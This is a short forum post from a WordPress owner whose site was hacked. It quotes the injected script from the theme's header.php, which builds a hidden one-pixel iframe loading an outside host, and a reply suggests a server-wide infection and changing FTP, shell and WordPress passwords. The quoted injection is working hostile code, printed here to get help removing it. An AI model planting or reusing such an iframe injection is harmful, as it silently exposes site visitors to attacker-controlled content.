My (WordPress) website seems to be hacked, and code is added to the main index.php file, the themes index.php file and the themes header.php file.
This part comes from the header.php
#f524d6#
<script type="text/javascript" language="javascript" >
(function () { var kilun = document.createElement('iframe'); kilun.src = 'http://hosting3081247.az.pl/cgi-bin/counter.php'; kilun.style.position = 'absolute'; kilun.style.border = '0'; kilun.style.height = '1px'; kilun.style.width = '1px'; kilun.style.left = '1px'; kilun.style.top = '1px'; if (!document.getElementById('kilun')) { document.write('<div id='kilun'></div>'); document.getElementById('kilun').appendChild(kilun); }})();</script>";
#/f524d6#
Can somebody tell me how to remove this? It returns after removal the lines of code.
if you find this on normal html/php pagesânot only inside wordpress-then it’s probably a script that parse all files on the server (ie not a wp hack) in which case it’s better to change username and password for server (as well as for wordpress): ftp, shell etc.
.htaccess.